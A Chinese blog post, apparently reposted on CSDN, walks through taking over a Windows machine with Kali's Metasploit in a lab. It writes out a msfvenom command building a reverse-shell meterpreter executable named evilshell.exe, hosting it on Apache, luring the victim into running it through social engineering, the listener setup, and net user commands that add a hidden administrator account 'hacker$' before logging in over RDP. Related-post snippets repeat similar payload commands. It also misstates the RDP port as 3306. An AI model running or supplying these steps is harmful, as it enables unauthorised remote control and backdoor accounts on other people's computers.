使用kail中Metasploit获取Windows的权限-9.20

最新推荐文章于 2021-05-13 19:35:05 发布
最新推荐文章于 2021-05-13 19:35:05 发布
阅读量342 收藏 2
点赞数
文章标签: 数据库 ruby shell
原文链接:http://www.cnblogs.com/yyhfirstblog/p/11567789.html
版权
  kail基于Debian的数字取证系统,上面集成很多渗透工具,其前身是BT5 (R3)(BrackTrack)。
其中Metasploit是一个综合利用工具,极大提高攻击者的渗透效率,使用Ruby开发的,使用方便,使用该工具的方式:msfconsole,MSF依赖于Postgresql数据库,在使用MSF之前要开启该数据库。
step1:生成木马,msfvenom
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.16.128  lport=555 -f exe >/root/桌面/evilshell.exe
-p -参数后跟上payload,攻击成功后要做什么事情;
lhost 后跟监听的IP
lport 后跟监听的端口
-f 后跟要监听的后门类型
 
step2:将木马文件evishell.exe文件放到/var/www/html文件夹下,开启Apache,在Windows里输入kail的ip,下载到桌面
step3:开启MSF,msfconsole(提前查看postgresql运行状态)
=[ metasploit v5.0.46-dev                          ]
+ -- --=[ 1921 exploits - 1075 auxiliary - 330 post       ]
+ -- --=[ 556 payloads - 45 encoders - 10 nops            ]
+ -- --=[ 4 evasion       
Exploits :开发利用,攻击某些服务、平台、系统等用到的工具
Payload:载荷载体,攻击成功后要操作什么
Msf>use exploit/multi/handler
msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
msf5 exploit(multi/handler) >show options
msf5 exploit(multi/handler) > set lhost 192.168.16.128
msf5 exploit(multi/handler) > set lport 555
msf5 exploit(multi/handler) > exploit
step4:在肉鸡中诱导用户点击exe程序(社会工程学攻击),在kail中就会得到肉鸡的shell(meterpreter)
meterpreter>shell
ipconfig
net user hacker$ 123.c /add
net localgroup administrators hacker$ /add
step5:在kail中开一个新终端,rdesktop 192.168.16.131
 
实验反思:使用win7系统实验失败,建议换成win service 2008 r2:
win7默认远程桌面(3306)端口是不开的,win7默认的cmd不是管理员权限,没有创建用户的权限,我在win7系统中用管理员打开cmd创建hacker(net user hacker$ 123.c /add),加入到管理员用户组(net localgroup Administrator hacker$ /add),然后在kail里远程连接(rdesktop 192.168.16.131),显示会挤掉win7正在登陆的用户,而win7那边也有提示。。。。。。。

转载于:https://www.cnblogs.com/yyhfirstblog/p/11567789.html

Sky_12306
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
使用MetasploitWindows7进行提权
zhanqinli的博客
04-21 592
8、可以查看到有多个模块可以使用,查看后面的描述来选择合适的,每个人的版本都可能不一样,因此漏洞也可能不一样,建议使用前几个模块来测试,不要问为什么(因为我后面都是试过了,都不行,或许你的可以动手试试吧。5、回到window7,运行刚刚下载的shell文件,在kali可以看到成功连接上了,然后在终端输入whoami /groups可以查看当前用户权限,可以看到我们只是普通用户。9、 复制该路径,使用use 进入,设置session,然后执行。
使用kailMetasploit获取Windows权限并提权
yuchen的博客
01-07 1955
0x01 环境搭建 虚拟机:kali 虚拟机:win7 0x02 实际操作 1.生成木马 2.移动木马至/var/www/html目录下 3.给木马文件evil.exe加上X权限 4.kali需要开启Apache2服务 5.用windows打开kali得ip下载木马文件 6.提前查看postgresql运行状态/etc/init.d/postgresql status 打开postgresql数据库/etc/init.d/postgresql start 打开后才会出现绿点 7.开启MSF 8
Linux上获取win7操作权限
好奇独角兽
10-13 392
学习在虚拟机上用Linux控制Windows7 工具:VMware Workstation、windows7镜像、kali linux 镜像 具体安装过程:百度都有的 开始上手吧(嘿嘿) 启动并登录kali linux 打开终端 在桌面上右键选择Open in Terminal 再打开一个终端,查看自己的IP段 ifconfig 暂时就不管输入ifconfig命令的这个终端了 寻找Win...
2019.9.20使用kali的metasploi获取windows权限
banshi6451的专栏
09-23 306
1 kali 基于debin的数字取证系统,上面集成了很多渗透测试工具,其前身是bt5r3(bractrack) 其Metasploit是一个综合利用工具,极大提高攻击者渗透效率,使用ruby开发的,使用非常方便,进入该工具的方式:msfconsole,msf依赖与postgresql数据库,在使用msf之前要开启该数据库 step1:生成木马,msfvenom msfvenom...
windows获取system权限
博客
11-14 2138
参考链接 Windows获取System权限 - 简书 https://www.jianshu.com/p/1e48b3a24e31 具体步骤 下载链接:PsExec - Windows Sysinternals | Microsoft Docs https://docs.microsoft.com/en-gb/sysinternals/downloads/psexec 以管理员身份启动cmd,使...
2020-kail linux 镜像下载 及kail工具使用教程
06-26
镜像文件下载kailkail工具使用从入门到入狱使用教程
kail-linux 的--平台安装
11-26
this is a chinese guidence to install kali-linux on various platform since the Penetration Testing Redefined with the Kali Linux come out in 2014 with the end of the bt5. For the fan of kali, there ...
kail-linux-light-2018.1
04-09
Linux镜像 一一一一一一一一Linux镜像 一一一一一一一一Linux镜像 一一一一一一一一
kail渗透测试wifi密码破解自动化脚本
最新发布
06-27
kail渗透测试wifi密码破解自动化脚本
Go-kail-简单kubernetes日志查看器
08-14
由于提供的压缩包文件名为"boz-kail-407c0cf",我们可以假设这是Go-kail的一个特定版本。下载完成后,解压并按照Readme文件的指示进行编译和安装。在Kubernetes集群环境,通过命令行调用Go-kail,并指定相应的参数...
网络安全工程师演示:原来黑客是这样获取你的计算机管理员权限的!【渗透】
Kali与编程
11-05 508
课前声明: 1、本分享仅做学习交流,请自觉遵守法律法规! 2、搜索:Kali 与编程,学习更多网络攻防干货! 3、Kali 与编程每天准时更新,敬请学习和关注! 正文部分 一、背景介绍 Metasploit就是一个漏洞框架。它的全称叫做The Metasploit Framework,简称叫做MSF。Metasploit作为全球最受欢迎的工具,不仅仅是因为它的方便性和强大性,更重要的是它的框架。它允许使用者开发自己的漏洞脚本,从而进行测试。Metasploit(msf)究竟威力如何呢?如何利用木马控制受害者
Metasploit实战三之——使用Metasploit获取目标的控制权限
冰河的专栏
01-23 3198
转载请注明出处:https://blog.csdn.net/l1028386804/article/details/86607498 攻击机: Kali 192.168.175.128 靶机: Win2012 R2 192.168.175.130 在上一篇《对威胁建模(附加搭建CVE:2014-6287漏洞环境)》,我们确定了目标系统的漏洞和Metasploit的可利用模块,接下来我们就真...
使用Kali上的Metasploit获取ssh登录到靶机权限
WEL测试
03-30 7202
前置条件 靶机:metasploitable2 靶机IP:192.168.88.137 初始密码是:msfadmin/msfadmin kali安装的镜像为:kali-linux-2019.1a-amd64.iso KaliIP为:192.168.88.132 使用Metasploit获取mysql登录密码 进入Metasploit的控制台执行命令: msfconsole ...
Linux kali虚拟机利用msf框架对win7的永恒之蓝渗透
yeshankuangrenaaaaa的博客
12-06 1万+
Linux kali虚拟机利用msf框架对win7的永恒之蓝渗透 术语 渗透攻击(exploit),指由攻击者或渗透测试者利用一个系统、应用或服务的安全 漏洞,所进行的攻击行为。 攻击载荷(payload),是我们期望目标系统在渗透攻击之后去执行的代码 shellcode,是在渗透攻击时作为攻击载荷运行的一组机器指令,通常用汇编语言编写 模块(Module),指Metasploit框架使用...
kali linux 数据源,kali Linux msf5 连接数据库 No database support
weixin_28716181的博客
05-13 175
kali Linux msf5 连接数据库 No database support测试环境Kali Linux 2019.1ametasploit v5.0.2-dev出现问题错误提示:一进入msfconsole 就报错[-] * WARNING: No database support: No database YAML file警告:无数据库支持:无数据库YAML文件 解决方法安装postgr...
kali之metasploit基本使用
Key_book(句芒安全实验室)
06-06 6849
metasploit简介 metasploit framework 简称 MSF. 是一个渗透攻击框架,可扩展.脚本使用ruby语言. 脚本以.rb做结尾. msf集成了很多渗透攻击的脚本(.rb)/模块 下面介绍下在kali简单的使用方法. MSF 的使用 命令行输入 msfconsole 进入metasploit MSF 的目录 /usr/share/met...
kalimetasploit使用
qq_28023797的博客
04-21 4989
kalimetasploit使用Metasploit是一款开源安全漏洞检测工具,附带数百个已知的软件漏洞,并保持频繁更新。被安全社区冠以“可以黑掉整个宇宙”之名的强大渗透测试框架。 在kali有用于渗透测试的利器:metasploit Auxiliary:辅助模块, encoders:供msfencode编码工具使用,具体可以使用msfencode –l exploits:攻击模
kali之入侵Win7系统1
weixin_33743880的博客
11-15 3823
木马程序:当执行这个程序时,隐藏的恶意程序在用户不知情的情况下也会执行,在内存运行 写木马文件,并赋予权限 root@kali:~#msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.48.123 lport=33389 -f exe > 360.exeroot@kali:~#ch...
metasploit 使用教程
热门推荐
jiangliuzheng的专栏
01-20 10万+
METASPLOIT基础入门 1、基础知识 1.1 简介 Metasploit是一款开源安全漏洞检测工具,附带数百个已知的软件漏洞,并保持频繁更新。被安全社区冠以“可以黑掉整个宇宙”之名的强大渗透测试框架。 Metasploit Framework最初是 HD Moore 个人的想法,当时他在一家安全公司工作,他于2003年10月发布了第一个基于Perl的Metasp
kail linux metasploit怎么使用
04-03
Kali Linux是一个流行的渗透测试和安全评估Linux发行版,Metasploit...需要注意的是,Metasploit是一个强大的工具,应该只在合法的测试和评估环境使用。在未经授权的情况下使用Metasploit可能会导致严重的法律后果。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值